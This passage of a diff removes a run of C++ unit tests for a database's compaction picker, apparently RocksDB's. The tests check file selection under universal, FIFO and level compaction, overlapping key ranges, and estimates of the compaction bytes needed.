-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(
-      universal_compaction_picker.PickCompaction(
-          cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-
-  ASSERT_TRUE(!compaction->is_trivial_move());
-}
-// Tests if the files can be trivially moved in multi level
-// universal compaction when allow_trivial_move option is set
-// In this test as the input files doesn't overlaps, they should
-// be trivially moved.
-TEST_F(CompactionPickerTest, AllowsTrivialMoveUniversal) {
-  const uint64_t kFileSize = 100000;
-
-  ioptions_.compaction_options_universal.allow_trivial_move = true;
-  UniversalCompactionPicker universal_compaction_picker(ioptions_, &icmp_);
-
-  NewVersionStorage(3, kCompactionStyleUniversal);
-
-  Add(0, 1U, "150", "200", kFileSize, 0, 500, 550);
-  Add(0, 2U, "201", "250", kFileSize, 0, 401, 450);
-  Add(0, 4U, "260", "300", kFileSize, 0, 260, 300);
-  Add(1, 5U, "010", "080", kFileSize, 0, 200, 251);
-  Add(2, 3U, "301", "350", kFileSize, 0, 101, 150);
-
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(
-      universal_compaction_picker.PickCompaction(
-          cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-
-  ASSERT_TRUE(compaction->is_trivial_move());
-}
-
-TEST_F(CompactionPickerTest, NeedsCompactionFIFO) {
-  NewVersionStorage(1, kCompactionStyleFIFO);
-  const int kFileCount =
-      mutable_cf_options_.level0_file_num_compaction_trigger * 3;
-  const uint64_t kFileSize = 100000;
-  const uint64_t kMaxSize = kFileSize * kFileCount / 2;
-
-  fifo_options_.max_table_files_size = kMaxSize;
-  ioptions_.compaction_options_fifo = fifo_options_;
-  FIFOCompactionPicker fifo_compaction_picker(ioptions_, &icmp_);
-  UpdateVersionStorageInfo();
-  // must return false when there's no files.
-  ASSERT_EQ(fifo_compaction_picker.NeedsCompaction(vstorage_.get()), false);
-
-  // verify whether compaction is needed based on the current
-  // size of L0 files.
-  uint64_t current_size = 0;
-  for (int i = 1; i <= kFileCount; ++i) {
-    NewVersionStorage(1, kCompactionStyleFIFO);
-    Add(0, i, ToString((i + 100) * 1000).c_str(),
-        ToString((i + 100) * 1000 + 999).c_str(),
-        kFileSize, 0, i * 100, i * 100 + 99);
-    current_size += kFileSize;
-    UpdateVersionStorageInfo();
-    ASSERT_EQ(fifo_compaction_picker.NeedsCompaction(vstorage_.get()),
-              vstorage_->CompactionScore(0) >= 1);
-  }
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(CompactionPickerTest, CompactionPriMinOverlapping1) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  ioptions_.compaction_pri = kMinOverlappingRatio;
-  mutable_cf_options_.target_file_size_base = 10000000;
-  mutable_cf_options_.target_file_size_multiplier = 10;
-  mutable_cf_options_.max_bytes_for_level_base = 10 * 1024 * 1024;
-
-  Add(2, 6U, "150", "179", 50000000U);
-  Add(2, 7U, "180", "220", 50000000U);
-  Add(2, 8U, "321", "400", 50000000U);  // File not overlapping
-  Add(2, 9U, "721", "800", 50000000U);
-
-  Add(3, 26U, "150", "170", 260000000U);
-  Add(3, 27U, "171", "179", 260000000U);
-  Add(3, 28U, "191", "220", 260000000U);
-  Add(3, 29U, "221", "300", 260000000U);
-  Add(3, 30U, "750", "900", 260000000U);
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(1U, compaction->num_input_files(0));
-  // Pick file 8 because it overlaps with 0 files on level 3.
-  ASSERT_EQ(8U, compaction->input(0, 0)->fd.GetNumber());
-}
-
-TEST_F(CompactionPickerTest, CompactionPriMinOverlapping2) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  ioptions_.compaction_pri = kMinOverlappingRatio;
-  mutable_cf_options_.target_file_size_base = 10000000;
-  mutable_cf_options_.target_file_size_multiplier = 10;
-  mutable_cf_options_.max_bytes_for_level_base = 10 * 1024 * 1024;
-
-  Add(2, 6U, "150", "175",
-      60000000U);  // Overlaps with file 26, 27, total size 521M
-  Add(2, 7U, "176", "200", 60000000U);  // Overlaps with file 27, 28, total size
-                                        // 520M, the smalelst overlapping
-  Add(2, 8U, "201", "300",
-      60000000U);  // Overlaps with file 28, 29, total size 521M
-
-  Add(3, 26U, "100", "110", 261000000U);
-  Add(3, 26U, "150", "170", 261000000U);
-  Add(3, 27U, "171", "179", 260000000U);
-  Add(3, 28U, "191", "220", 260000000U);
-  Add(3, 29U, "221", "300", 261000000U);
-  Add(3, 30U, "321", "400", 261000000U);
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(1U, compaction->num_input_files(0));
-  // Picking file 7 because overlapping ratio is the biggest.
-  ASSERT_EQ(7U, compaction->input(0, 0)->fd.GetNumber());
-}
-
-TEST_F(CompactionPickerTest, CompactionPriMinOverlapping3) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  ioptions_.compaction_pri = kMinOverlappingRatio;
-  mutable_cf_options_.max_bytes_for_level_base = 10000000;
-  mutable_cf_options_.max_bytes_for_level_multiplier = 10;
-
-  // file 7 and 8 over lap with the same file, but file 8 is smaller so
-  // it will be picked.
-  Add(2, 6U, "150", "167", 60000000U);  // Overlaps with file 26, 27
-  Add(2, 7U, "168", "169", 60000000U);  // Overlaps with file 27
-  Add(2, 8U, "201", "300", 61000000U);  // Overlaps with file 28, but the file
-                                        // itself is larger. Should be picked.
-
-  Add(3, 26U, "160", "165", 260000000U);
-  Add(3, 27U, "166", "170", 260000000U);
-  Add(3, 28U, "180", "400", 260000000U);
-  Add(3, 29U, "401", "500", 260000000U);
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(1U, compaction->num_input_files(0));
-  // Picking file 8 because overlapping ratio is the biggest.
-  ASSERT_EQ(8U, compaction->input(0, 0)->fd.GetNumber());
-}
-
-// This test exhibits the bug where we don't properly reset parent_index in
-// PickCompaction()
-TEST_F(CompactionPickerTest, ParentIndexResetBug) {
-  int num_levels = ioptions_.num_levels;
-  mutable_cf_options_.level0_file_num_compaction_trigger = 2;
-  mutable_cf_options_.max_bytes_for_level_base = 200;
-  NewVersionStorage(num_levels, kCompactionStyleLevel);
-  Add(0, 1U, "150", "200");       // <- marked for compaction
-  Add(1, 3U, "400", "500", 600);  // <- this one needs compacting
-  Add(2, 4U, "150", "200");
-  Add(2, 5U, "201", "210");
-  Add(2, 6U, "300", "310");
-  Add(2, 7U, "400", "500");  // <- being compacted
-
-  vstorage_->LevelFiles(2)[3]->being_compacted = true;
-  vstorage_->LevelFiles(0)[0]->marked_for_compaction = true;
-
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-}
-
-// This test checks ExpandWhileOverlapping() by having overlapping user keys
-// ranges (with different sequence numbers) in the input files.
-TEST_F(CompactionPickerTest, OverlappingUserKeys) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  ioptions_.compaction_pri = kByCompensatedSize;
-
-  Add(1, 1U, "100", "150", 1U);
-  // Overlapping user keys
-  Add(1, 2U, "200", "400", 1U);
-  Add(1, 3U, "400", "500", 1000000000U, 0, 0);
-  Add(2, 4U, "600", "700", 1U);
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-              cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(1U, compaction->num_input_levels());
-  ASSERT_EQ(2U, compaction->num_input_files(0));
-  ASSERT_EQ(2U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(3U, compaction->input(0, 1)->fd.GetNumber());
-}
-
-TEST_F(CompactionPickerTest, OverlappingUserKeys2) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  // Overlapping user keys on same level and output level
-  Add(1, 1U, "200", "400", 1000000000U);
-  Add(1, 2U, "400", "500", 1U, 0, 0);
-  Add(2, 3U, "000", "100", 1U);
-  Add(2, 4U, "100", "600", 1U, 0, 0);
-  Add(2, 5U, "600", "700", 1U, 0, 0);
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-              cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(2U, compaction->num_input_levels());
-  ASSERT_EQ(2U, compaction->num_input_files(0));
-  ASSERT_EQ(3U, compaction->num_input_files(1));
-  ASSERT_EQ(1U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(2U, compaction->input(0, 1)->fd.GetNumber());
-  ASSERT_EQ(3U, compaction->input(1, 0)->fd.GetNumber());
-  ASSERT_EQ(4U, compaction->input(1, 1)->fd.GetNumber());
-  ASSERT_EQ(5U, compaction->input(1, 2)->fd.GetNumber());
-}
-
-TEST_F(CompactionPickerTest, OverlappingUserKeys3) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  // Chain of overlapping user key ranges (forces ExpandWhileOverlapping() to
-  // expand multiple times)
-  Add(1, 1U, "100", "150", 1U);
-  Add(1, 2U, "150", "200", 1U, 0, 0);
-  Add(1, 3U, "200", "250", 1000000000U, 0, 0);
-  Add(1, 4U, "250", "300", 1U, 0, 0);
-  Add(1, 5U, "300", "350", 1U, 0, 0);
-  // Output level overlaps with the beginning and the end of the chain
-  Add(2, 6U, "050", "100", 1U);
-  Add(2, 7U, "350", "400", 1U);
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-              cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(2U, compaction->num_input_levels());
-  ASSERT_EQ(5U, compaction->num_input_files(0));
-  ASSERT_EQ(2U, compaction->num_input_files(1));
-  ASSERT_EQ(1U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(2U, compaction->input(0, 1)->fd.GetNumber());
-  ASSERT_EQ(3U, compaction->input(0, 2)->fd.GetNumber());
-  ASSERT_EQ(4U, compaction->input(0, 3)->fd.GetNumber());
-  ASSERT_EQ(5U, compaction->input(0, 4)->fd.GetNumber());
-  ASSERT_EQ(6U, compaction->input(1, 0)->fd.GetNumber());
-  ASSERT_EQ(7U, compaction->input(1, 1)->fd.GetNumber());
-}
-
-TEST_F(CompactionPickerTest, OverlappingUserKeys4) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  mutable_cf_options_.max_bytes_for_level_base = 1000000;
-
-  Add(1, 1U, "100", "150", 1U);
-  Add(1, 2U, "150", "199", 1U, 0, 0);
-  Add(1, 3U, "200", "250", 1100000U, 0, 0);
-  Add(1, 4U, "251", "300", 1U, 0, 0);
-  Add(1, 5U, "300", "350", 1U, 0, 0);
-
-  Add(2, 6U, "100", "115", 1U);
-  Add(2, 7U, "125", "325", 1U);
-  Add(2, 8U, "350", "400", 1U);
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(2U, compaction->num_input_levels());
-  ASSERT_EQ(1U, compaction->num_input_files(0));
-  ASSERT_EQ(1U, compaction->num_input_files(1));
-  ASSERT_EQ(3U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(7U, compaction->input(1, 0)->fd.GetNumber());
-}
-
-TEST_F(CompactionPickerTest, OverlappingUserKeys5) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  // Overlapping user keys on same level and output level
-  Add(1, 1U, "200", "400", 1000000000U);
-  Add(1, 2U, "400", "500", 1U, 0, 0);
-  Add(2, 3U, "000", "100", 1U);
-  Add(2, 4U, "100", "600", 1U, 0, 0);
-  Add(2, 5U, "600", "700", 1U, 0, 0);
-
-  vstorage_->LevelFiles(2)[2]->being_compacted = true;
-
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() == nullptr);
-}
-
-TEST_F(CompactionPickerTest, OverlappingUserKeys6) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  // Overlapping user keys on same level and output level
-  Add(1, 1U, "200", "400", 1U, 0, 0);
-  Add(1, 2U, "401", "500", 1U, 0, 0);
-  Add(2, 3U, "000", "100", 1U);
-  Add(2, 4U, "100", "300", 1U, 0, 0);
-  Add(2, 5U, "305", "450", 1U, 0, 0);
-  Add(2, 6U, "460", "600", 1U, 0, 0);
-  Add(2, 7U, "600", "700", 1U, 0, 0);
-
-  vstorage_->LevelFiles(1)[0]->marked_for_compaction = true;
-  vstorage_->LevelFiles(1)[1]->marked_for_compaction = true;
-
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(2U, compaction->num_input_levels());
-  ASSERT_EQ(1U, compaction->num_input_files(0));
-  ASSERT_EQ(3U, compaction->num_input_files(1));
-}
-
-TEST_F(CompactionPickerTest, OverlappingUserKeys7) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  mutable_cf_options_.max_compaction_bytes = 100000000000u;
-  // Overlapping user keys on same level and output level
-  Add(1, 1U, "200", "400", 1U, 0, 0);
-  Add(1, 2U, "401", "500", 1000000000U, 0, 0);
-  Add(2, 3U, "100", "250", 1U);
-  Add(2, 4U, "300", "600", 1U, 0, 0);
-  Add(2, 5U, "600", "800", 1U, 0, 0);
-
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(2U, compaction->num_input_levels());
-  ASSERT_GE(1U, compaction->num_input_files(0));
-  ASSERT_GE(2U, compaction->num_input_files(1));
-  // File 5 has to be included in the compaction
-  ASSERT_EQ(5U, compaction->inputs(1)->back()->fd.GetNumber());
-}
-
-TEST_F(CompactionPickerTest, OverlappingUserKeys8) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  mutable_cf_options_.max_compaction_bytes = 100000000000u;
-  // grow the number of inputs in "level" without
-  // changing the number of "level+1" files we pick up
-  // Expand input level as much as possible
-  // no overlapping case
-  Add(1, 1U, "101", "150", 1U);
-  Add(1, 2U, "151", "200", 1U);
-  Add(1, 3U, "201", "300", 1000000000U);
-  Add(1, 4U, "301", "400", 1U);
-  Add(1, 5U, "401", "500", 1U);
-  Add(2, 6U, "150", "200", 1U);
-  Add(2, 7U, "200", "450", 1U, 0, 0);
-  Add(2, 8U, "500", "600", 1U);
-
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(2U, compaction->num_input_levels());
-  ASSERT_EQ(3U, compaction->num_input_files(0));
-  ASSERT_EQ(2U, compaction->num_input_files(1));
-  ASSERT_EQ(2U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(3U, compaction->input(0, 1)->fd.GetNumber());
-  ASSERT_EQ(4U, compaction->input(0, 2)->fd.GetNumber());
-  ASSERT_EQ(6U, compaction->input(1, 0)->fd.GetNumber());
-  ASSERT_EQ(7U, compaction->input(1, 1)->fd.GetNumber());
-}
-
-TEST_F(CompactionPickerTest, OverlappingUserKeys9) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  mutable_cf_options_.max_compaction_bytes = 100000000000u;
-  // grow the number of inputs in "level" without
-  // changing the number of "level+1" files we pick up
-  // Expand input level as much as possible
-  // overlapping case
-  Add(1, 1U, "121", "150", 1U);
-  Add(1, 2U, "151", "200", 1U);
-  Add(1, 3U, "201", "300", 1000000000U);
-  Add(1, 4U, "301", "400", 1U);
-  Add(1, 5U, "401", "500", 1U);
-  Add(2, 6U, "100", "120", 1U);
-  Add(2, 7U, "150", "200", 1U);
-  Add(2, 8U, "200", "450", 1U, 0, 0);
-  Add(2, 9U, "501", "600", 1U);
-
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(2U, compaction->num_input_levels());
-  ASSERT_EQ(5U, compaction->num_input_files(0));
-  ASSERT_EQ(2U, compaction->num_input_files(1));
-  ASSERT_EQ(1U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(2U, compaction->input(0, 1)->fd.GetNumber());
-  ASSERT_EQ(3U, compaction->input(0, 2)->fd.GetNumber());
-  ASSERT_EQ(4U, compaction->input(0, 3)->fd.GetNumber());
-  ASSERT_EQ(7U, compaction->input(1, 0)->fd.GetNumber());
-  ASSERT_EQ(8U, compaction->input(1, 1)->fd.GetNumber());
-}
-
-TEST_F(CompactionPickerTest, OverlappingUserKeys10) {
-  // Locked file encountered when pulling in extra input-level files with same
-  // user keys. Verify we pick the next-best file from the same input level.
-  NewVersionStorage(6, kCompactionStyleLevel);
-  mutable_cf_options_.max_compaction_bytes = 100000000000u;
-
-  // file_number 2U is largest and thus first choice. But it overlaps with
-  // file_number 1U which is being compacted. So instead we pick the next-
-  // biggest file, 3U, which is eligible for compaction.
-  Add(1 /* level */, 1U /* file_number */, "100" /* smallest */,
-      "150" /* largest */, 1U /* file_size */);
-  file_map_[1U].first->being_compacted = true;
-  Add(1 /* level */, 2U /* file_number */, "150" /* smallest */,
-      "200" /* largest */, 1000000000U /* file_size */, 0 /* smallest_seq */,
-      0 /* largest_seq */);
-  Add(1 /* level */, 3U /* file_number */, "201" /* smallest */,
-      "250" /* largest */, 900000000U /* file_size */);
-  Add(2 /* level */, 4U /* file_number */, "100" /* smallest */,
-      "150" /* largest */, 1U /* file_size */);
-  Add(2 /* level */, 5U /* file_number */, "151" /* smallest */,
-      "200" /* largest */, 1U /* file_size */);
-  Add(2 /* level */, 6U /* file_number */, "201" /* smallest */,
-      "250" /* largest */, 1U /* file_size */);
-
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(2U, compaction->num_input_levels());
-  ASSERT_EQ(1U, compaction->num_input_files(0));
-  ASSERT_EQ(1U, compaction->num_input_files(1));
-  ASSERT_EQ(3U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(6U, compaction->input(1, 0)->fd.GetNumber());
-}
-
-TEST_F(CompactionPickerTest, OverlappingUserKeys11) {
-  // Locked file encountered when pulling in extra output-level files with same
-  // user keys. Expected to skip that compaction and pick the next-best choice.
-  NewVersionStorage(6, kCompactionStyleLevel);
-  mutable_cf_options_.max_compaction_bytes = 100000000000u;
-
-  // score(L1) = 3.7
-  // score(L2) = 1.85
-  // There is no eligible file in L1 to compact since both candidates pull in
-  // file_number 5U, which overlaps with a file pending compaction (6U). The
-  // first eligible compaction is from L2->L3.
-  Add(1 /* level */, 2U /* file_number */, "151" /* smallest */,
-      "200" /* largest */, 1000000000U /* file_size */);
-  Add(1 /* level */, 3U /* file_number */, "201" /* smallest */,
-      "250" /* largest */, 1U /* file_size */);
-  Add(2 /* level */, 4U /* file_number */, "100" /* smallest */,
-      "149" /* largest */, 5000000000U /* file_size */);
-  Add(2 /* level */, 5U /* file_number */, "150" /* smallest */,
-      "201" /* largest */, 1U /* file_size */);
-  Add(2 /* level */, 6U /* file_number */, "201" /* smallest */,
-      "249" /* largest */, 1U /* file_size */, 0 /* smallest_seq */,
-      0 /* largest_seq */);
-  file_map_[6U].first->being_compacted = true;
-  Add(3 /* level */, 7U /* file_number */, "100" /* smallest */,
-      "149" /* largest */, 1U /* file_size */);
-
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(2U, compaction->num_input_levels());
-  ASSERT_EQ(1U, compaction->num_input_files(0));
-  ASSERT_EQ(1U, compaction->num_input_files(1));
-  ASSERT_EQ(4U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(7U, compaction->input(1, 0)->fd.GetNumber());
-}
-
-TEST_F(CompactionPickerTest, NotScheduleL1IfL0WithHigherPri1) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  mutable_cf_options_.level0_file_num_compaction_trigger = 2;
-  mutable_cf_options_.max_bytes_for_level_base = 900000000U;
-
-  // 6 L0 files, score 3.
-  Add(0, 1U, "000", "400", 1U);
-  Add(0, 2U, "001", "400", 1U, 0, 0);
-  Add(0, 3U, "001", "400", 1000000000U, 0, 0);
-  Add(0, 31U, "001", "400", 1000000000U, 0, 0);
-  Add(0, 32U, "001", "400", 1000000000U, 0, 0);
-  Add(0, 33U, "001", "400", 1000000000U, 0, 0);
-
-  // L1 total size 2GB, score 2.2. If one file being comapcted, score 1.1.
-  Add(1, 4U, "050", "300", 1000000000U, 0, 0);
-  file_map_[4u].first->being_compacted = true;
-  Add(1, 5U, "301", "350", 1000000000U, 0, 0);
-
-  // Output level overlaps with the beginning and the end of the chain
-  Add(2, 6U, "050", "100", 1U);
-  Add(2, 7U, "300", "400", 1U);
-
-  // No compaction should be scheduled, if L0 has higher priority than L1
-  // but L0->L1 compaction is blocked by a file in L1 being compacted.
-  UpdateVersionStorageInfo();
-  ASSERT_EQ(0, vstorage_->CompactionScoreLevel(0));
-  ASSERT_EQ(1, vstorage_->CompactionScoreLevel(1));
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() == nullptr);
-}
-
-TEST_F(CompactionPickerTest, NotScheduleL1IfL0WithHigherPri2) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  mutable_cf_options_.level0_file_num_compaction_trigger = 2;
-  mutable_cf_options_.max_bytes_for_level_base = 900000000U;
-
-  // 6 L0 files, score 3.
-  Add(0, 1U, "000", "400", 1U);
-  Add(0, 2U, "001", "400", 1U, 0, 0);
-  Add(0, 3U, "001", "400", 1000000000U, 0, 0);
-  Add(0, 31U, "001", "400", 1000000000U, 0, 0);
-  Add(0, 32U, "001", "400", 1000000000U, 0, 0);
-  Add(0, 33U, "001", "400", 1000000000U, 0, 0);
-
-  // L1 total size 2GB, score 2.2. If one file being comapcted, score 1.1.
-  Add(1, 4U, "050", "300", 1000000000U, 0, 0);
-  Add(1, 5U, "301", "350", 1000000000U, 0, 0);
-
-  // Output level overlaps with the beginning and the end of the chain
-  Add(2, 6U, "050", "100", 1U);
-  Add(2, 7U, "300", "400", 1U);
-
-  // If no file in L1 being compacted, L0->L1 compaction will be scheduled.
-  UpdateVersionStorageInfo();  // being_compacted flag is cleared here.
-  ASSERT_EQ(0, vstorage_->CompactionScoreLevel(0));
-  ASSERT_EQ(1, vstorage_->CompactionScoreLevel(1));
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-}
-
-TEST_F(CompactionPickerTest, NotScheduleL1IfL0WithHigherPri3) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  mutable_cf_options_.level0_file_num_compaction_trigger = 2;
-  mutable_cf_options_.max_bytes_for_level_base = 900000000U;
-
-  // 6 L0 files, score 3.
-  Add(0, 1U, "000", "400", 1U);
-  Add(0, 2U, "001", "400", 1U, 0, 0);
-  Add(0, 3U, "001", "400", 1000000000U, 0, 0);
-  Add(0, 31U, "001", "400", 1000000000U, 0, 0);
-  Add(0, 32U, "001", "400", 1000000000U, 0, 0);
-  Add(0, 33U, "001", "400", 1000000000U, 0, 0);
-
-  // L1 score more than 6.
-  Add(1, 4U, "050", "300", 1000000000U, 0, 0);
-  file_map_[4u].first->being_compacted = true;
-  Add(1, 5U, "301", "350", 1000000000U, 0, 0);
-  Add(1, 51U, "351", "400", 6000000000U, 0, 0);
-
-  // Output level overlaps with the beginning and the end of the chain
-  Add(2, 6U, "050", "100", 1U);
-  Add(2, 7U, "300", "400", 1U);
-
-  // If score in L1 is larger than L0, L1 compaction goes through despite
-  // there is pending L0 compaction.
-  UpdateVersionStorageInfo();
-  ASSERT_EQ(1, vstorage_->CompactionScoreLevel(0));
-  ASSERT_EQ(0, vstorage_->CompactionScoreLevel(1));
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-}
-
-TEST_F(CompactionPickerTest, EstimateCompactionBytesNeeded1) {
-  int num_levels = ioptions_.num_levels;
-  ioptions_.level_compaction_dynamic_level_bytes = false;
-  mutable_cf_options_.level0_file_num_compaction_trigger = 4;
-  mutable_cf_options_.max_bytes_for_level_base = 1000;
-  mutable_cf_options_.max_bytes_for_level_multiplier = 10;
-  NewVersionStorage(num_levels, kCompactionStyleLevel);
-  Add(0, 1U, "150", "200", 200);
-  Add(0, 2U, "150", "200", 200);
-  Add(0, 3U, "150", "200", 200);
-  // Level 1 is over target by 200
-  Add(1, 4U, "400", "500", 600);
-  Add(1, 5U, "600", "700", 600);
-  // Level 2 is less than target 10000 even added size of level 1
-  // Size ratio of L2/L1 is 9600 / 1200 = 8
-  Add(2, 6U, "150", "200", 2500);
-  Add(2, 7U, "201", "210", 2000);
-  Add(2, 8U, "300", "310", 2600);
-  Add(2, 9U, "400", "500", 2500);
-  // Level 3 exceeds target 100,000 of 1000
-  Add(3, 10U, "400", "500", 101000);
-  // Level 4 exceeds target 1,000,000 by 900 after adding size from level 3
-  // Size ratio L4/L3 is 9.9
-  // After merge from L3, L4 size is 1000900
-  Add(4, 11U, "400", "500", 999900);
-  Add(5, 11U, "400", "500", 8007200);
-
-  UpdateVersionStorageInfo();
-
-  ASSERT_EQ(200u * 9u + 10900u + 900u * 9,
-            vstorage_->estimated_compaction_needed_bytes());
-}
-
-TEST_F(CompactionPickerTest, EstimateCompactionBytesNeeded2) {
-  int num_levels = ioptions_.num_levels;
-  ioptions_.level_compaction_dynamic_level_bytes = false;
-  mutable_cf_options_.level0_file_num_compaction_trigger = 3;
-  mutable_cf_options_.max_bytes_for_level_base = 1000;
-  mutable_cf_options_.max_bytes_for_level_multiplier = 10;
-  NewVersionStorage(num_levels, kCompactionStyleLevel);
-  Add(0, 1U, "150", "200", 200);
-  Add(0, 2U, "150", "200", 200);
-  Add(0, 4U, "150", "200", 200);
-  Add(0, 5U, "150", "200", 200);
-  Add(0, 6U, "150", "200", 200);
-  // Level 1 size will be 1400 after merging with L0
-  Add(1, 7U, "400", "500", 200);
-  Add(1, 8U, "600", "700", 200);
-  // Level 2 is less than target 10000 even added size of level 1
-  Add(2, 9U, "150", "200", 9100);
-  // Level 3 over the target, but since level 4 is empty, we assume it will be
-  // a trivial move.
-  Add(3, 10U, "400", "500", 101000);
-
-  UpdateVersionStorageInfo();
-
-  // estimated L1->L2 merge: 400 * (9100.0 / 1400.0 + 1.0)
-  ASSERT_EQ(1400u + 3000u, vstorage_->estimated_compaction_needed_bytes());
-}
-
-TEST_F(CompactionPickerTest, EstimateCompactionBytesNeeded3) {
-  int num_levels = ioptions_.num_levels;
-  ioptions_.level_compaction_dynamic_level_bytes = false;
-  mutable_cf_options_.level0_file_num_compaction_trigger = 3;
-  mutable_cf_options_.max_bytes_for_level_base = 1000;
-  mutable_cf_options_.max_bytes_for_level_multiplier = 10;
-  NewVersionStorage(num_levels, kCompactionStyleLevel);
-  Add(0, 1U, "150", "200", 2000);
-  Add(0, 2U, "150", "200", 2000);
-  Add(0, 4U, "150", "200", 2000);
-  Add(0, 5U, "150", "200", 2000);
-  Add(0, 6U, "150", "200", 1000);
-  // Level 1 size will be 10000 after merging with L0
-  Add(1, 7U, "400", "500", 500);
-  Add(1, 8U, "600", "700", 500);
-
-  Add(2, 9U, "150", "200", 10000);
-
-  UpdateVersionStorageInfo();
-
-  ASSERT_EQ(10000u + 18000u, vstorage_->estimated_compaction_needed_bytes());
-}
-
-TEST_F(CompactionPickerTest, EstimateCompactionBytesNeededDynamicLevel) {
-  int num_levels = ioptions_.num_levels;
-  ioptions_.level_compaction_dynamic_level_bytes = true;
-  mutable_cf_options_.level0_file_num_compaction_trigger = 3;
-  mutable_cf_options_.max_bytes_for_level_base = 1000;
